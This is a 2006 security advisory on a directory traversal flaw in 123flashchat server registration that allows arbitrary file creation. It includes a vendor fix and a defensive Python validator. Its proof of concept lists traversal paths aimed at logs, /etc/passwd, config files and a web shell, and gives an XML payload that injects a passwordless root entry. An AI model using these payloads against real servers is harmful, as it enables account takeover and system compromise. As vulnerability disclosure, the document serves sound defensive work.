ISAA-2006-001.txt
Posted Jan 21, 2006
Authored by Jesus Olmos Gonzalez

123flashchat server versions 5.1 and below suffer from a directory traversal vulnerability that allows arbitrary file creation.

tags | exploit, arbitrary
SHA-256 | c355585c5c78eafe4950127b4ae6fcaf275381bbd3eae5c5002c6553dbf4ad06

=============================================
INTERNET SECURITY AUDITORS ALERT 2006-001
- Original release date: January 09, 2006
- Last revised: January 13, 2006
- Discovered by: Jesus Olmos Gonzalez
- Severity: 4/5
=============================================

I. VULNERABILITY
-------------------------
Arbitrary remote file creation in 123flashchat server.

II. BACKGROUND
-------------------------
123 Flash Chat is a full-featured Java chat server with a Flash chat
client. The product homepage is www.123flashchat.com, and a demo can be
tested at:

http://host10.123flaschat.com/123flaschat.swf
http://www.123flashchat.com/123flashchat.swf


III. DESCRIPTION
-------------------------
The chat server has a user-registration feature that is enabled by the
following setting:

<enable-user-register>On</enable-user-register>

in /server/etc/groups/default.xml

By default it is enabled and anybody can create a chat account.


The registration form asks for the following fields:
username, password, repeat-password and email.

When a user creates an account, a file named after the username is
created in the members directory:

/123flashchat/server/data/default/members/isec-user

The user file has the following structure:
^@^B^@^<username>^@^V<password>^@^E<email>
or
^@^B^@^<username>^@^V<password>^@^@

field        size  allow null  parse                      example
username     32    no          allows traversal (../)     ../room_1.txt
password     32    no          allows all                 123
repeat-pass  32    no          allows all                 123
email        128   yes         /^.+@.+\..+$/              a@b.c


The username field allows anybody to create a file on our system, with
the same privileges as the server and almost arbitrary content.

This is dangerous because a user can take over other accounts, erase
logs, modify the server's /etc/passwd or modify other config files.


IV. PROOF OF CONCEPT
-------------------------
In the exploitation there are two factors, WHERE and WHAT. The username
vector is WHERE, and WHAT can be:
1) the password
2) the email address, if more bytes are needed


Possible attacks:

../../../../logs/access.log          erase logs.
../../../../logs/error.log           erase logs.
../default/logs/access.log           erase logs.
../members/parker                    change parker's password; if we now
                                     log in as parker, he will be
                                     disconnected.

../../../../../../../etc/passwd      if the server runs as root.
../../../../etc/ssh/sshd.conf        if the server runs as root.
../../../../../var/log/messages      if the server runs as root.
../../../../var/www/htdocs/x.php     try to build a shell.
../../../etc/groups/default.xml      create an admin account or change other
                                     config settings.
../../../fcserver.sh                 try to replace the script.

etc.

It is possible to replace existing files to cause a DoS, erase logs,
create or change system accounts, take over other chat user or admin
accounts, or cause other effects on the server's system.

*Possible* remote execution if some config file is modified.

It is possible to hijack and modify the raw command, injecting line
feeds (0x0a) or other characters to construct arbitrary content for the
created/overwritten file.

Example:

<?xml version="1.0" encoding="UTF-8"?>
<Register email="" passwd="(0x0a)root::0:0:root:/bin/bash(0x0a)"
user="../../../../../../../etc/passwd" />(0x0a)

/etc/passwd will be:

\0\2\0\3../../../../../../../etc/passwd\0\3
root::0:0:root:/bin/bash
\0\0

If the server runs on Windows, it is possible to get execution.
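The two defects behind sections III and IV are a username that is used verbatim as a file name (so "../" escapes the members directory) and password/email values that carry raw control bytes into the written record. The following is an added example, not code from the advisory or from 123flashchat (which is a Java server); it re-implements in Python the checks a fixed server would apply to the Register message shown above: an allowlist on the username, a containment check on the resolved record path, and a control-character check on both the raw message and the parsed attribute values. The 32-character limit comes from the advisory's table; the install path, the helper names and the sample messages are assumptions constructed for this example.

```python
import os
import re
import xml.etree.ElementTree as ET

# Field limit taken from the advisory's table; the install path, helper
# names and sample messages below are assumptions constructed for this example.
USERNAME_MAX = 32
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,%d}$" % USERNAME_MAX)
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")
MEMBERS_DIR = "/srv/123flashchat/server/data/default/members"  # assumed install path


def username_is_safe(username):
    """Allowlist check: a short run of [A-Za-z0-9_.-] that is not made of dots only.
    Slashes, backslashes and control characters never pass, so no path separator
    or '..' component can reach the filesystem."""
    return bool(USERNAME_RE.match(username)) and username.strip(".") != ""


def member_file_path(members_dir, username):
    """Resolve where the member record would be written and return that path
    only if it stays inside members_dir; otherwise return None."""
    root = os.path.realpath(members_dir)
    target = os.path.realpath(os.path.join(root, username))
    if target == root or os.path.commonpath([root, target]) != root:
        return None
    return target


def check_register(message, members_dir=MEMBERS_DIR):
    """Audit one raw Register message (the XML form shown in the advisory).
    Returns (accepted, reasons); reasons lists every rule the message violates."""
    reasons = []
    body = message.rstrip("\r\n\x00")  # the framing terminator is not content
    # Literal control bytes (the 0x0a injection from the advisory) are checked
    # on the raw text, because an XML parser silently turns a newline inside an
    # attribute value into a space and a check after parsing would miss it.
    if CONTROL_CHARS.search(body):
        reasons.append("control character in raw message")
    try:
        elem = ET.fromstring(body)
    except ET.ParseError:
        return False, reasons + ["malformed XML"]
    user = elem.get("user", "")
    if not username_is_safe(user):
        reasons.append("username fails allowlist: %r" % user)
    if member_file_path(members_dir, user) is None:
        reasons.append("username resolves outside the members directory")
    # Entity-encoded newlines (&#10;) survive parsing, so check decoded values too.
    for attr in ("passwd", "email"):
        if CONTROL_CHARS.search(elem.get(attr, "")):
            reasons.append("control character in %s" % attr)
    return (not reasons), reasons


# Constructed sample messages, one per line as the trailing 0x0a in the
# advisory's PoC suggests the protocol frames them.
XML_HEAD = '<?xml version="1.0" encoding="UTF-8"?>'
SAMPLE_MESSAGES = {
    # a normal registration, as a legitimate client would send it
    "legit": XML_HEAD + '<Register email="a@b.c" passwd="123" user="isec-user" />\n',
    # the advisory's PoC: traversal in user, raw line feeds in passwd
    "traversal": XML_HEAD + '<Register email="" passwd="\nroot::0:0:root:/bin/bash\n" '
                            'user="../../../../../../../etc/passwd" />\n',
    # traversal that lands back inside members/: would overwrite another user's record
    "sibling": XML_HEAD + '<Register email="" passwd="123" user="../members/parker" />\n',
    # the same injection with an entity-encoded line feed, invisible to the raw check
    "entity": XML_HEAD + '<Register email="" passwd="&#10;x" user="isec-user2" />\n',
}


def audit_all(messages=SAMPLE_MESSAGES):
    """Run every sample through check_register; returns {name: (accepted, reasons)}."""
    return {name: check_register(msg) for name, msg in messages.items()}


if __name__ == "__main__":
    for name, (accepted, reasons) in audit_all().items():
        print("%-9s %s %s" % (name, "ACCEPT" if accepted else "REJECT", "; ".join(reasons)))
```

The "sibling" sample is the reason the allowlist is kept alongside the containment check: "../members/parker" resolves back inside the members directory, so a path check alone would accept it, yet it targets another user's record exactly as the advisory's parker example describes. The "entity" sample shows the converse for the content check: the raw-byte scan does not see `&#10;`, so the decoded attribute values have to be scanned as well.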


V. BUSINESS IMPACT
-------------------------
The chat service can be crashed or compromised remotely.


VI. SYSTEMS AFFECTED
-------------------------
This vulnerability affects the 123flashchat server up to 5.1 (released
on Dec 22, 2005).

Tested on:
123flashchat server 5.1
123flashchat server 5.0


VII. SOLUTION
-------------------------
The vendor has released version 5.1_2:

http://www.123flashchat.com/flash-chat-server-v512.html


VIII. REFERENCES
-------------------------
-

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Jesus Olmos
Gonzalez (jolmos=at=isecauditors=dot=com).


X. REVISION HISTORY
-------------------------
January 09, 2006: Initial release.
January 13, 2006: Vendor response updated.


XI. DISCLOSURE TIMELINE
-------------------------
January 04, 2006 Vulnerability discovered by Internet Security
Auditors (http://www.isecauditors.com).
January 09, 2006 Initial vendor notification sent.
January 10, 2006 Quick response, Version 5.1_2 was released.

XII. LEGAL NOTICES
-------------------------
-